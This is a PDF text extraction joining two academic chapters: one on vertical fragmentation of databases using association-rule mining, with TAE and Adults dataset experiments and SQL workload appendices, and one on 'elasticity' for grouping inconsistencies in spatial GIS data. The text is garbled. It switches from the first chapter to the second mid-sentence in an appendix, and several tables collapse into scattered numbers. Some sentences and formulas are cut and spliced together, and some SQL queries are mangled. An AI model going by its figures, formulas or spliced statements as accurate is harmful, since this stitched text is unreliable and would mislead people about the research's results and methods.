uses Adults database with 15 attributes and 30,162 tuples, which has been used in prior research (Sung, Li, Tan, & Ng, 2003).
First Experiment (with TAE Dataset) As shown in Table 2, the attributes of the Teaching Assistant Education dataset (UCI, 1999) are
Table 2. TAE database description
Attributes
Attribute Length (bytes)
Type Nominal: Non-english-speaker, English-speaker
19
course_instructor
Categorical: Range from 1 – 25 categories
2
course
Categorical: Range from 1 – 26 categories
2
semester
Nominal: summer, regular
7
class_size
Numerical
2
Categorical: low, medium, high
6
speaker
class_attribute
Table 3. Result of TAE with minimum support of 20% Confidence (%) 20 30 40 50 60 70 80 Optimal Design
Attribute Partitioning C ABDEF E ABCDF BE ACDF F BE ACD D BE ACF C F AD BE B D E F AC F BE ACD
Vertical Fragmentation in Databases Using Data-Mining Technique
30%, 40%, 50%, 60%, 70%, and 80%). Tables 3 through 7 have the results of partitioning schemes for 20% to 60% support for various confidence levels, while Table 8 has the best solutions for various support levels. As can be seen from Table 8, the best partitioning design obtained by the proposed algorithm at 20% or 30% support levels, resulting in an improvement of 493 units or 13.62% over unpartitioned relation. Our solution matched the optimal design obtained by exhaustive enumeration, which
also has a 13.62% improvement over unpartitioned solution. The optimal solution is: {speaker, course, semester}, {course_instructor, class_size}, {class_attribute} Figure 3 shows the plot of number of partitions and percent cost savings at 20% minimum support level for various confidence levels on TAE database. It can be observed that as the
Table 4. Results on TAE with minimum support of 30%
Table 8. Best partitioning designs for various support levels (TAE database) Min Support
Best Partitioning Scheme
Total Cost
Cost Reduction
20%
F
BE
ACD
3123.40
13.62%
30%
F
BE ACD
3123.40
13.62%
BE
3506.00
3.04%
E AF
3676.50
-1.67%
3840.40
-6.21%
3123.40
13.62%
40%
C
F AD
50%
B
C
60% Optimal Design Without Partition
A B F BE ABCDEF
D C
ACD
D
E
F
3616.00
2553
Vertical Fragmentation in Databases Using Data-Mining Technique
Figure 3. Partitions and cost savings at 20% support level varying confidence (TAE database)
600
6
500
Cost Savings
300
4
200 100
3
0 -100
20
30
40
50
60
70
-200
80
2
No of partitions
5
400
Cost Savings Partitions
1
-300 -400
0 Minimum Confidence (%)
minimum confidence level increases, there are more partitions, because higher confidence results in fewer higher level Large itemsets. Thus there will be several small fragments. It can also be observed that high-cost savings are achieved at 50% minimum confidence. At lower confidence levels, there are fewer fragments resulting in high database costs for retrieval transactions. Similarly, at higher confidence levels, there are many fragments resulting in high cost of insert/delete transactions.
Second Experiment (with Adults Database) The block size of Adults DB (UCI, 1999) is assumed to be 4K. For ease of presentation, the attributes of age, workclass, final-weight, education, education-num, marital-status, occupation, relationship, race, sex, capital-gain, capital-loss,
2554
hours-per-week, native-country and class are labeled as A through O. The Adults database description is given in Table 9. Based on the workload guidelines (Yu et al., 1992), we generate the transaction set for this database (Appendix B). Our partitioning solution represents an enhancement of 41.05% over unpartitioned design (Table 10). The result shows the optimal solutions at 30% and 40% support levels have similar total cost of database operations. Though the total minimum cost should decrease with the increasing minimum support, the minor difference in costs may be attributed to the frequency of transactions. As can be seen from Table 10, the optimal partitioning scheme for Adults database is as follows: {WorkClass} {Final-Weight} {Education}
Vertical Fragmentation in Databases Using Data-Mining Technique
Table 9. The adults database description (adapted from UCI, 1999)
Nominal: >50, 1 if indexed file is used). Assuming c=2 on the average, the complexity becomes 2n+4n2. Furthermore, there will be additional accesses for creating partitions from the Large Itemsets: n2(1+1/2+1/4+1/8+…) or approximately 2n 2. Thus the total computational complexity becomes 6n 2+2n. Thus our algorithm has a time complexity of (O(n2) + O(n)), (where n is number of attributes). The complexity of our algorithm is comparable to or better than previous algorithms. For example, the bond energy algorithm (McCormick,
Schweitzer, & White, 1972) has a complexity of O(n3), the graphical approach (Navathe & Ra, 1989) has a complexity of O(n2), and the binary partitioning approach (Chu & Ieong, 1993) has a complexity of O(2m), where m is the number of transactions.
DISCUSSION A new method for attribute partitioning has been proposed based on association rules, which is applied to two real life data sets. In the smaller database (TAE), there is an improvement of 13.62% over unpartitioned relation, matching the optimal solution obtained by exhaustive enumeration. With the larger database (Adults), there is a cost savings of 41.05% over unpartitioned solution and has taken less than a second for the algorithm to find the best solution. Our results demonstrate the viability of Association Rules as an attribute partitioning technique. Following are some remarks regarding the partitioning schemes. The optimal partitioning scheme depends on transaction mix and database characteristics. Fewer inserts/deletes in the transaction mix result in more fragmented solution, since the cost of these transactions is high on partitioned relations. Furthermore, higher the minimum support level, the resulting optimal solution is more fragmented. Higher the minimum confidence level, the more fragmented the partitioning scheme is, since a few items will qualify to next level itemsets (see Tables 2-7). Our results using standard workloads indicate, optimal partitioning is obtained at around 30% support level and 40%-50% confidence level, which can be used by the database designer in real life. Optionally, the database designer may perform experiments around these support and confidence-levels using most frequent transactions (with 80/20 rule) and determine optimal fragmentation schemes. The later procedure is
2557
Vertical Fragmentation in Databases Using Data-Mining Technique
especially useful when the transaction mix is skewed. The database designers in the real world can use the methodology suggested in this research to determine efficient partitioning schemes. In order to do that, the designer needs to collect data on the transactions (such as, type of transaction – retrievals and updates, frequency of transaction, set of attributes required, and the conditions of retrieval) and the database characteristics (such as, attribute lengths, selectivity of attributes, and number of tuples in each table, and block size). Transaction information may be obtained by studying the reports and screens used by the managers or operating staff in the organization.
FUTURE RESEARCH Present research can be extended in the following directions. First, we use one table at a time for determining partitions, in line with most previous works on vertical partitioning. Join operations can be incorporated into the algorithm by converting those operations to corresponding operations on single tables and applying the algorithm on each table. Transactions using aggregate operators should be weighted more through frequency. Second, the present methodology can be extended to include other physical design techniques, such as access path selection (clustered index, unclustered index, or sequential scan) (Cornell & Yu, 1990; De, Park, & Pirkul, 1988; Song & Gorla, 2000). The cost function needs to be modified to incorporate the chosen access path. Third, we use number of disk accesses as the evaluating cost function in line with most previous research. A better partitioning solution can be obtained when physical characteristics of disk and access characteristics of transactions are incorporated in the cost function (Gorla & Boe, 1990). Fourth, while the scope of present research is determination of disjoint partitions, the research can be extended to include overlapping partitions.
2558
While the present research deals with vertical partitioning solution in centralized relational databases using association rules, the research can be extended to distributed and object-oriented database designs. In distributed databases, user queries originate at various distribution sites and data resides at different locations. The present research can be extended to model the affinity between sites and the required data items using association rules, thereby solving data allocation problems. The solution should provide optimal way to locate various tables and/or attributes across the nodes of a distributed network, so that the user transactions can be processed with the least data transmission costs. In a similar manner, horizontal partitioning of distributed databases can be derived modeling the affinity between tuples and user transactions using association rules. These horizontal partitions can be placed in the most optimal locations, so that communication costs are minimized and parallelism is achieved. In object-oriented databases, the placement of attributes and instances across super type and sub types is a physical design problem (Gorla, 2001). By modeling the associations between instance variables required in the transactions with the subclasses, the physical location of the instance variables in the subclasses can be determined. Thus, by using the association-rule based heuristic, the optimal storage structures for object-oriented databases can be designed, which results in the least database costs of retrieval and update transactions.
REFERENCES Agrawal, R., Mannila, H., Srikant, R., Toivonen, H., & Verkamo, A. I. (1996). Fast discovery of association rules. In Advances in Knowledge Discovery and Data Mining. AAAI/MIT Press.
Vertical Fragmentation in Databases Using Data-Mining Technique
Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In Proceedings of the 20th International Conference on Very Large Databases. Santiago, Chile. Ailamaki, A., Dewitt, D. J., Hill, M. D., & Skounakis, M. (2001). Weaving relations for cache performance. In Proceedings of the 27th VLDB Conference. Bagui, S. (2006). An approach to mining crime patterns. International Journal of Data Warehousing and Mining, 2(1), 50-80. Ceri, S., Navathe, S., & Wiederhold, G. (1983). Distribution design of logical database schemas. IEEE Transactions on Software Engineering, SE-9(4). Chen, M. S., Han, J., & Yu, P. S. (1996). Data mining: An overview from database perspective. IEEE Transactions on Knowledge and Data Engineering, 8(6), 866-883. Chen, Y., Dehne, Y., Eavis, T., & Rau-Chaplin, A. (2006). Improved data partitioning for building large ROLAP data cubes in parallel. International Journal of Data Warehousing and Mining, 2(1),1-26. Cheng, C-H., Lee, W-K., & Wong, K-F. (2002). A genetic algorithm-based clustering approach for database partitioning. IEEE Transactions on Systems, Man, and Cybernetics, 32(3), 215-230. Chu, W. W. & Ieong, I. T. (1993). A transaction-based approach to vertical partitioning for relational database systems. IEEE Transaction on Software Engineering, 19(8), 804-812. Cornell, D. W. & Yu, P. S. (1990). An effective approach to vertical partitioning for physical design of relational databases. IEEE Transactions on Software Engineering, 16(2), 248-258. De, P., Park, J. S., & Pirkul, H. (1988). An integrated model of record segmentation and access
path selection for databases. Information Systems, 13(1), 13-30. Ezeife, C. I. (2001). Selecting and materializing horizontally partitioned warehouse views. Data and Knowledge Engineering, 36, 185-210. Frawley, W. J., Piatetsky-Shapiro, G., & Matheus, C. J. (1991). Knowledge discovery in database: An overview. In G. Piatetsky-Shapiro & W. J. Frawley (Eds.), Knowledge discovery databases. AAAI/MIT Press. Fung, C-W., Karlapalem, K., & Li, Q. (2002). An evaluation of vertical class partitioning for query processing in object-oriented databases. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1095-1118. Furtado, C., Lima, A., Pacitti, E., Valduriez, P., & Mattoso, M. (2005). Physical and virtual partitioning in OLAP database cluster. In Proceedings of the 17th International Symposium on Computer Architecture and High Performance Computing (pp. 143-150). Gorla, N. (2001). An object-oriented database design for improved performance. Data and Knowledge Engineering, 37, 117-138. Gorla, N., & Boe, W. (1990). Effect of schema size on fragmentation design in multirelational databases. Information Systems, 15, 291-301. Hammer, M., & Niamir, B. (1979). A heuristic approach to attribute partitioning. ACM SIGMOD International Conference on Management of Data. Han, J., & Fu, Y. (1999). Mining multiple-level association rules in large databases. IEEE Transactions on Knowledge and Data Engineering, 11(5), 798-805. Hoffer, J. A. (1976). An integer programming formulation of computer database design problems. Information Science, 11, 29-48.
2559
Vertical Fragmentation in Databases Using Data-Mining Technique
Hoffer, J. A., & Severance, D. G. (1975). The use of cluster analysis in physical data base design. International Conference on Very large Databases. Labio, W. J., Quass, D., & Adelberg, B. (1997). Physical database design for data warehouses. In Proceedings of the IEEE Conference on Data Engineering (pp. 277-288).
Song, S. K., & Gorla, N. (2000). A genetic algorithm for vertical fragmentation and access path selection. The Computer Journal, 45(1), 81-93. Sung, S. Y., Li, Z., Tan, C. L., & Ng, P. A. (2003). Forecasting association rules using existing data sets. IEEE Transactions on Knowledge and Data Engineering, 15(6), 1448-1459.
March, S. T. (1983). Techniques in structuring database records. ACM Computing Surveys, 15(1).
Tjioe, H. C., & Taniar, D. (2005). Mining association rules in data warehouse. International Journal of Data Warehousing and Mining, 1(3), 28-62.
March, S. T., & Rho, S. (1995). Allocating data and operations to nodes in distributed database design. IEEE Trans. on Knowledge and Data Engineering, 7(2).
Tzanis, G., & Berberidis, C. (2007). Mining for mutually exclusive items in transaction databases. International Journal of Data Warehousing and Mining, 3(3).
McCormick, W. T., Jr., Schweitzer, P. J., & White, T. W. (1972). Problem decomposition and data organization by a clustering technique. Operations Research, 20(5), 993-1009.
Yao, S. B. (1977). Approximating block access in data-base organization. Communications of the ACM, 20(4), 260-261.
Navathe, S., Ceri, S., Wiederhold, G., & Dou, J. (1984). Vertical partitioning algorithms for database design. ACM Transactions on. Database Systems. Navathe, S., & Ra, M. (1989). Vertical partitioning for database design: A graphical algorithm. In Proceedings of the 1989 ACM SIGMOD/ Ng, V., Gorla, N., Law, D.M., & Chan, C. K. (2003). Applying genetic algorithms in database partitioning. In Proceedings of the 2003 ACM Symposium on Applied Computing (SAC) (pp. 544-549). Ozsu, M., & Valduriez, P. (1996). Principles of distributed database systems. Prentice Hall. Park, J-S., Chen, M-S., & Yu, P. S. (1995). Mining association rules with adjustable accuracy (IBM research report). Ramamurthy, R., Dewitt, D. J., & Su, Q. (2002). A case for fractured mirrors. In Proceedings of the 28th VLDB Conference.
2560
Yen, S-J., & Chen, A. L. P. (2001). A graph-based approach for discovering various types of association rules. IEEE Transactions on Knowledge and Data Engineering, 12(5), 839-845. Yu, P. S., Chen, M. S., Heiss, H. U., & Lee, S. (1992). Workload characterization of relational database environments. IEEE Transactions of Software Engineering, 18(4), 347-355. UCI. (1999). Machine learning repository content summary. Retrieved February 8, 2008, from http:// www.ics.uci.edu/~mlearn/MLSummary.html Zaki, M. J. (2000). Scalable Algorithms for association mining. IEEE Transactions on Knowledge and Data Engineering, 12(3), 372-390. Zaki, M. J., & Hsiao, C-J. (2005). Efficient algorithms for mining closed itemsets and their lattice structures. IEEE Transactions on Knowledge and Data Engineering, 17(4), 462-478.
Vertical Fragmentation in Databases Using Data-Mining Technique
APPENDIX A. TRANSACTIONS FOR TAE DATABASE No 1 2 3 4 5 6 7 8 9 10 11 12
Query SELECT speaker, course_instructor, course, semester, class_size WHERE class_size < 5 SELECT speaker, course_instructor, semester, class_size, class_attribute WHERE course 18 SELECT speaker, course, class_attribute WHERE class_size “low”) SELECT speaker, course, semester, class_size, class_attribute WHERE class_size = 64 AND semester = “regular” AND course_instructor >= 5 SELECT course_instructor, class_size WHERE course_instructor = 11 OR class_attribute > “low” OR semester = 39 Number of tuples to be inserted : 1 INSERT SQL Number of tuples to be deleted : 4 DELETE SQL
Freq 2 3 13 15 2 7 15 6 18 10 6 3
2561
Vertical Fragmentation in Databases Using Data-Mining Technique
APPENDIX B: TRANSACTION SET FOR ADULTS DATABASE No SELECT 1 WHERE
Race = “White” AND Age 1 would occur only if Ii > Ni, that is i has more inconsistent neighbors than neighbors. This is not possible by definition of Ii and Ni.
The higher the elasticity value, the more likely the object to contribute to the inconsistency. This is the case since an object that is inconsistent with all or many of its neighbors is likely to be the source of the inconsistency more so than an object that is inconsistent with relatively few of its neighbors.
Full Elasticity The elasticity of an object may equal 1. ELSi = 1 only when Ii = Ni, that is i is pair-wise inconsistent with all its neighbors.
FORMATION OF ELASTICITY-BASED IPR GROUPINGS (EIGS)
Partial Elasticity
Real world inconsistencies are likely to occur between two or more objects. A technique to group the corresponding objects of a multi-object inconsistency in the spatial representation is required. This can be achieved by grouping objects using knowledge of the IPRs they are part of, as well as their elasticity. Elasticity is used to group IPRs into multi-object structures that correspond to inconsistencies among multiple entities in the real world. The relative contribution of objects to these multi-object inconsistencies is established using elasticity.
The elasticity of an object may be a value between 0 and 1. 0 < ELSi < 1 only when Ii < Ni, that is i is pair-wise inconsistent with at least one but not all of its neighbors.
Example of Elasticity To understand the significance of the elasticity of an object, consider an example where two inconsistent pair-wise relations are detected between three objects i, j, and k, which are neighbors with one another, such that IPRij = T and IPRik = T. No IPR is detected between j, and k, and no additional IPRs are detected between i, j, and k and any other of their neighbors. Suppose i has two neighbors ( j, and k), and j and k each has 6 and 4 neighboring objects, respectively. Then 2 = 1, 2 1 ELSj = , 6
ELSi =
Interpretation of IPRs in Terms of Elasticity A number of observations can be made about an IPR by looking at the elasticity of its member objects. The observations are later used for grouping IPRs into multi-object inconsistencies. Consider a pair of objects Oi and Oj such that IPRij = T. In determining the elasticity of each of the two objects, two types of IPRs are distinguished.
Unbalanced IPR
and 1 4
ELSk = . Since object i is inconsistent with all objects it is neighbors with, it has a high elasticity value. This example is illustrated in Figure 7.
If ELSi > ELSj then object i is referred to as the higher elasticity object and j as the lower elasticity object. This occurs if one of the following conditions is satisfied:
2693
Introducing Elasticity for Spatial Knowledge Management
•
•
•
The objects are inconsistent with one another and with no other objects. Object i has fewer neighbors than j. In this scenario we conclude that the object i that has fewer numbers of neighbors N is more likely to be used as the basis for grouping IPRs. Both objects have the same number of neighbors. Object i is inconsistent with more objects then j. In this scenario we conclude that the object, which is inconsistent with more of its neighbors, is more likely to be used as the basis for grouping IPRs. The rate of the number of objects i is inconsistent with, divided by the number of objects it is neighbors with, is greater than the rate of the number of objects j is inconsistent with divided by the number of objects it is neighbors with. In this scenario we conclude that the object with the higher rate is more likely to be used as the basis for grouping IPRs.
Balanced IPR If ELSi = ELSj then objects i and j have the same level of elasticity. This is referred to as a balanced IPR. It occurs if: •
•
•
2694
The objects are inconsistent with one another and with no other objects. Object i has the same number of neighbors as does j. In this scenario, no further grouping is required. Both objects have the same number of neighbors. Object i is inconsistent with the same number of objects as does j. In this scenario additional information is required to determine which object will be used as the basis for grouping IPRs. The number of objects i is inconsistent with, relative to the number of objects it is neighbors with, is the same as the number of objects j is inconsistent with, relative to the number of objects it is neighbors with. In this scenario the object that has a larger
number of IPRs is more likely to be used as the basis for grouping IPRs.
Defining EIGs An elasticity-based IPR grouping (EIG) is a set of one or more objects where the object of highest elasticity in the group forms an IPR with each of the remaining objects in the group.
Example of an EIG To clarify this definition, consider the following situation: Consider three objects i, j, and k that are neighbors with one another, but with no other objects. Let i and j form an inconsistent pair-wise relation IPRij such that ELSi > ELSj. Let i and k form an inconsistent pair-wise relation IPRik such that ELSi > ELSk. Objects i, j, k are said to constitute an inconsistent set since object i has the highest elasticity value among the three objects and it forms an IPR with each of the other two objects. This is referred to as an elasticity-based IPR grouping (EIG) and denote it as ELSijk. This is illustrated in Figure 8.
Detecting EIGs This is extended into a technique to analyze all IPRs in the database and group them into EIGs based on the elasticity of the objects which form the IPRs: • • • •
•
Determine all IPRs. Extract a list of all objects in all IPRs and determine their elasticity values. Sort the list of objects in descending order by elasticity. Sort objects that have the same elasticity values by the number of IPRs they are a part of, that is, Ii in descending order. Create the first empty EIG, to which objects will be assigned.
Introducing Elasticity for Spatial Knowledge Management
Figure 8. A schematic view of an EIG ELSi
ELS j
2 2
1
i
1 2
EIGijk j
k
ELSk
•
•
For each object in the sorted list (whether it has or has not yet been assigned to constructed EIGs): o Determine all IPRs in which this object participates. o For each such IPR: Identify the second object in the IPR. Check the remaining objects in the sorted list (those objects with the same or smaller elasticity values) for occurrence of the second object regardless if they are already part of one or more EIGs. If the second object is found: o Assign the first object to the current EIG (if not assigned before to this EIG). o Assign the second object to the current EIG. o If there are still objects that have not
1 2
yet been assigned to any EIGs, create the next empty EIG to which objects will be assigned. This results in a list of multi-object inconsistencies (EIGs). Each object’s elasticity helps form these inconsistencies. In future work, we will explore how elasticity can be used to assist with object adjustment decisions that would eliminate or reduce the number and complexity of such multi-object inconsistencies.
EXAMPLE RESULTS Experiments were conducted on GIS data from a number of public and private sector organizations. These geographic information systems consist of a cross section of utility infrastructure, commercial, land and taxation data. A distinction is made between source data sets (SDS), which are the GIS databases analyzed in
2695
Introducing Elasticity for Spatial Knowledge Management
this research, and experimental data sets (EDS), which are subsets of one or more SDS on which the experiments were conducted. SDS is discussed in 5.1 and EDS are presented in Section 5.2.
Source Data Sets (SDS) Each SDS examined in this research consists of numerous layers of raw spatial data built and maintained by highly-qualified and experienced people engaged in commercial applications. Three of these SDS are discussed in this section. They are listed in Table 1.
Experimental Data Sets (EDS) Experimental data sets were created from the source data sets and used throughout this research. This section describes two such EDS that were constructed from the three SDS described in the previous section. The first EDS, denoted EDS-1, was created by selecting a number of layers of SDS-1 in a geographic region, while the second EDS, denoted EDS-2 was formed by combining selected layers from SDS-2 and SDS-3 in a geographic region.
Table 1. Source data sets (SDS) SDS Geographic Coverage of Data Set ID SDS-1 Guelph SDS-2 Toronto (North York) SDS-3 Toronto (North York)
Data Source City of Guelph, Canada Teranet Inc., Canada North York Municipal Offices, Canada
Table 2. Experimental data set EDS-1 EDS ID Geographic Coverage Number of Objects Layer ID 1 2 3 4
2696
EDS-1 0.5 km by 0.6 km of Guelph. 749 Layers Source Number of Layer Description SDS Objects Residence. SDS-1 202 Shed. SDS-1 65 Property. SDS-1 201 Tree. SDS-1 281
Introducing Elasticity for Spatial Knowledge Management
Figure 9. EDS 1
Table 3. Experimental data set EDS-2 EDS ID Geographic Coverage Number of Objects Layer ID 1 2 3 4 5
EDS-2 5100 ft by 5700 ft segment of North York. 9653 Layers Source Layer Description Number of Objects SDS Road. SDS-2 112 Property. SDS-2 3437 Building. SDS-3 4991 Water Pipe Junction. SDS-3 609 Sewer Manhole. SDS-3 504
2697
Introducing Elasticity for Spatial Knowledge Management
Table 4. IPRs in EDS-1
Layer Residence Shed Tree Shed Tree Tree
Property
Overlap
18
Property Residence Shed Tree Property
Overlap Overlap Overlap Overlap Overlap
10 4 2 6 1
M-Rule violated M-4 M-15
EDS-1 Number of IPRs based on Automatically Observed Relation
Observed Relation Layer Relation
Number of IPRs based on Stationary M-Rules which were violated
Nature of Violation 2 sheds in property 2 residences in property
4 2
Table 5. IPRs in EDS-2
Layer Building Building Building Sewer Sewer Sewer Water Water Water
Observed Relation Layer Building Property Road Road Property Building Road Property Building
M-Rule violated M-12 M-12 M-12
2698
EDS-2 Number of IPRs based on Automatically Observed Relation Relation Overlap Overlap Overlap Overlap Overlap Overlap Overlap Overlap Overlap
27 142 56 11 11 10 20 20 16 Number of IPRs based on Stationary M-Rules which were violated
Introducing Elasticity for Spatial Knowledge Management
Table 6. IPR summary
EDS-1 EDS-2
Total IPRs 47 346
Number of Objects 749 9653
IPR as Percent of Objects 6.27% 3.58%
Table 7. Classification of EIGs in EDS-1 EDS-1
2 8 3 4
Number of EIGs Detected by Visual Inspection 2 8 3 4
2
2
1 3
1 3
1
1
4 2
4 2
Number of EIGs Automatically Detected
Semantic Description of EIG A Residence overlaps with one Property. A Residence overlaps with more then one Property. A Shed overlaps with more then one Property. A Tree overlaps with a Residence. A Shed inside one property overlaps with a second Shed. The second Shed overlaps two properties. (Show drawing here). A Tree overlaps with more then one other Tree. A Tree overlaps with one Tree. A Tree overlaps with a Residence, and also with another Tree A property contains two Sheds. A property contains two Residences.
The first experimental data set EDS-1 covers a portion of Guelph, Ontario, Canada and is discussed in Table 2. The data in EDS-1 is shown graphically in Figure 9. The second data set listed in Table 3 comprises of a portion of North York, which was created by combining data from two GIS databases, and adjusting them to common control points. The data in EDS-2 is shown graphically in Figure 10.
The number of IPRs detected based on automatically observed relations that do not correspond to P-Rules or M-Rules are described in the first part of Table 4 and Table 5 for EDS-1 and EDS-2 respectively. Those automatically observed relations that correspond to M-Rules but have a frequency that is either smaller than the lower bound or larger than the upper bound of the M-Rules, are presented in the second part of these tables.
2699
Introducing Elasticity for Spatial Knowledge Management
Table 8. Classification of EIGs in EDS-2 EDS-2 Semantic Description of EIG Two buildings inside one property overlap one another. Two buildings overlap one another. One of the buildings is inside a property, the other building overlaps this same property as well as and adjoining property (drawing goes here). A building overlaps two properties. A building overlaps a property, a second building inside the same property as well as the adjoining road (drawing goes here). A building overlaps a property as well as the adjoining road. A Sewer overlaps a road and the adjoining property. A Building overlaps a property and an adjoining road, as well as a Sewer that overlaps the same road and property. A building that overlaps a property and adjoining road, and a sewer that is inside the property. A Water Pipe Junction overlaps a road and the adjoining property. A Building overlaps a property and an adjoining road, as well as a Water Pipe Junction that overlaps the same road and property. A building that overlaps a property and adjoining road, and a Water Pipe Junction that is inside the property. A property contains three buildings. A property contains four buildings. A property contains five buildings.
Number of EIGs Automatically Detected 14
Number of EIGs Detected by Visual Inspection 14
9
9
34
34
4
4
26 7
26 7
4
4
6
6
13
13
7
7
9
9
24 4 5
24 4 5
Table 9. EIG analysis for EDS-1
Layer Residence Shed Property Tree
2700
EDS-1 Number of EIGs whose Highest Elasticity Object is on the Layer
Percent of Total EIGs
12
40%
9 0 9
30% 0% 30%
Introducing Elasticity for Spatial Knowledge Management
Figure 10. EDS 2
Table 10. EIG analysis for EDS-2
Layer Road Property Building Water Sewer
EDS-2 Number of EIGs whose Highest Elasticity Object is on the Layer 0
Percent of Total EIGs
0
0%
135
81.32%
20 11
12.04% 6.62%
0%
2701
Introducing Elasticity for Spatial Knowledge Management
Table 11. EIG Summary EIG as Number of Percent of Objects Objects 749 4.01% 9653 1.72%
Total EIGs EDS-1 EDS-2
30 166
Table 12. Percent of Objects in EIGs
EDS-1 EDS-2
Number of Objects 749 9653
Number of Objects in EIGs 68 467
The number of IPRs detected in each EDS is listed in Table 6. The EIGs which were detected by grouping IPRs based on their semantic structure are listed in Table 7 and Table 8 for EDS-1 and EDS-2 respectively, along with the count of the number of such EIGs formed. The types of objects with highest elasticity in the EIGs are summarized in Table 9 and Table 10 for EDS-1 and EDS-2 respectively. The number of EIGs detected in each EDS is listed in Table 11. The number of objects in EIGs, and the percent of objects that are in EIGs out of the total number of objects in each EDS are listed in Table 12.
2702
Percent of objects in EIGs 9.07% 4.83%
DISCUSSION The IPRs in EDS-1 listed in Table 4 indicate the existence of isolated incidents of IPRs of different types in very small quantities. This same situation is seen when observing the types of EIGs detected in Table 7. The only exception to this is the number of residences which overlap with more then one property, indicating a possibility of some pattern of inconsistent behavior depending on their proximity. This pattern, if exists, would not be extensive, and therefore, there is no need for clustering EDS-1 or applying a regional strategy to this data set. The IPRs in EDS-2 listed in Table 5 and the corresponding EIGs in Table 8 indicate an appreciable number of inconsistencies involving
Introducing Elasticity for Spatial Knowledge Management
buildings, and to a lesser extent inconsistencies involving sewers and water pipe junctions. This situation is clearly demonstrated in Table 10 which shows that 135 buildings require adjustment, as do 20 water pipe junctions and 11 sewer manholes. This same table shows that over 81 percent of the inconsistencies are due to building objects, with 12 percent and 7 percent due to water pipe junctions and sewer manholes respectively. The building layer in EDS-2, which originates from aerial photography, is a likely cause of a significant number of the inconsistencies in EDS-2. Both EDS-1 and EDS-2 were visually inspected for inconsistencies. All inconsistencies found during the visual inspection of the data sets were also automatically detected in terms of EIGs as seen in Table 7 and Table 8. A measure of consistency of spatial data is proposed in terms of the number of EIGs, as shown in Table 11, and in terms of objects in EIGs as shown in Table 12. It is apparent from both tables that while EDS-2 has 5 times as many EIGs as EDS-1, EDS-1 is nearly twice as inconsistent as is EDS-2. It therefore seems that the merger of SDS-2 and SDS-3 to form EDS-2 produced consistency levels that are higher than that of EDS-1.
CONCLUSION A method for detecting inconsistencies between pairs of objects, or IPRs, based on a comparison of observed relations against P-Rules and M-Rules was presented. Elasticity, a property of objects was introduced to capture the relative contribution of objects to IPRs. Elasticity was then used to group IPRs into multi-object structures, called EIGs, correspond to inconsistencies among multiple neighboring entities in the real world. The relative contribution of objects in EIGs was established using elasticity, and will be applied to the EIG adjustment process in future publications.
Having systematically formulated inconsistent behavior in spatial databases, the regional aspects of some inconsistencies can be captured by clustering of EIGs. Future work is expected to discuss how elasticity and the clustering techniques are used in the process of finding local and global solutions to EIGs. More and more organizations in all business sectors integrate spatial data with their existing non-spatial data sets. Spatial data integration and the resulting quality of this integration are becoming therefore critical to integration of more and more non-spatial databases. Integration of spatial databases in a way that minimizes inconsistencies in the combined data set leads to minimizing of inconsistencies when combining the non-spatial data sets that these spatial databases are linked to. Knowledge discovery in combined non-spatial databases is therefore likely to produce higher quality results.
REFERENCES Abler, R. (1987). The national science foundation national center for geographic information and analysis. International Journal of Geographic Information Systems, 1(4), 303-326. Aronoff, S. (1995). Geographic information systems: A management perspective. WDL Publications. Balmisse, G., Meingan, D., & Passerini, K. (2007). Technology trends in knowledge management tools. International Journal of Knowledge Management, 3(2), 118–131. Clementini, E., Felice, P.D., & Van Oosterom, P. (1993). A small set of formal topological relations suitable for end-user interaction, advances in spatial databases. In proceedings 3rd International Symposium, SSD’93, Singapore, Lecture Notes in Computer Science, Vol. 692 (Springer-Verlag, New York) (pp. 277-295).
2703
Introducing Elasticity for Spatial Knowledge Management
Cockcroft, S. (2004). The design and implementation of a repository for the management of spatial data integrity constraints. Volume 8, Number 1 / March, Pages 49-69. Davis, E. (1986). Representing and acquiring geographic knowledge. Los Altos, CA: Morgan Kaufmann Publishers, Inc. Egenhofer, M.J. (1991). Reasoning about binary topological relations, Lecture notes in computer science. Advances in spatial databases, 2nd Symposium, SDD’91, Zurich, Switzerland Egenhofer, M.J., & Franzosa, R.D. (1995). On equivalence of topological relations. International Journal of Geographical Information Systems, 9(2), 133-152. Egenhofer, M.J., & Franzosa, R.D. (1991). Pointset topological spatial relations. International Journal of Geographic Information Systems, 5(2), 161-174. Egenhofer, M.J., & Herring, J.R. (1992). Categorizing binary topological relations between regions, lines, and points in geographic databases. Technical report, Department of Survey Engineering, University of Maine, Orono, ME. Egenhofer, M.J., & Herring, J.R. (1991). A mathematical framework for the definition of topological relations. NCGIA technical paper 91-97 Egenhofer, M., & Herring, J. (1990). A Mathematical framework for the definition of Topological Relations. Proceedings of 4th International Symposium on Spatial Data Handling, (pp. 803-813). Zurich, Switzerland. Hadzilacos, T., & Tryfona, N.. (1992). A Model for Expressing Topological Integrity Constraints in Geographic Databases. In A. Frank, I. Campari, & U. Formentini (Eds.), Proceedings of the International Conference on Theories and Models of Spatio Temporal Reasoning in Geographic
2704
Space. Pisa, Italy. Lecture notes in Computer Science, Vol. 639 (Springer Verlag, New York), (pp. 252-268). Hayes-Roth, F., Waterman, D., & Lenat, D. (1983). Building expert systems. Reading, MA: AddisonWesley Publishing Company. Kainz, W. (1991). Logical consistency. In Guptil & Morison (Eds.), Elements of spatial data quality (pp.109-137). Oxford. Klien, A. (2007). A rule-based strategy for the semantic annotation of geodata. Transactions in GIS, 11(3), 437–452. Lutz, M., & Kolas, D. (2007). Rule-based discovery in spatial data infrastructure. Transactions in GIS, 11(3), 317–336. Mark, D., Frank, A., Egenhofer, M., Freundshuh, S., McGranghan, M., & White, R.M. (Eds.) (1989). Languages of spatial relations: Report on the specialist meeting for NCGIA research initiative 2. Technical Report 89-2, national Center for Geographic Information and Analysis. Mark, D.M., & Egenhofer, M.J. (1992). An evaluation of the 9-intersection for region line relations. In Proceedings of GIS/LIS ’93, San Jose, CA, (pp. 513-521). Medeiros, C.B., & Cilia, M. (1995). Maintenance of binary topological constraints through active databases. In Proceedings of 3rd ACM Workshop on GIS. Redman, T.C. (1992). Data quality. Bantam. Servigne, S., Ubeda, T., Zuricelli, A., & Laurini, R. (2000). A methodology for spatial consistency improvement of geographic databases. GeoInformatica, 4(1), 7-34. Smith, R., & Park, K.K. (1991). An algebraic approach to spatial reasoning. NCGIA technical paper 91-97.
Introducing Elasticity for Spatial Knowledge Management
Veregin, H. (1991). Data quality measurement and assessment. NCGIA Core Curriculum in Geographic Information Science.
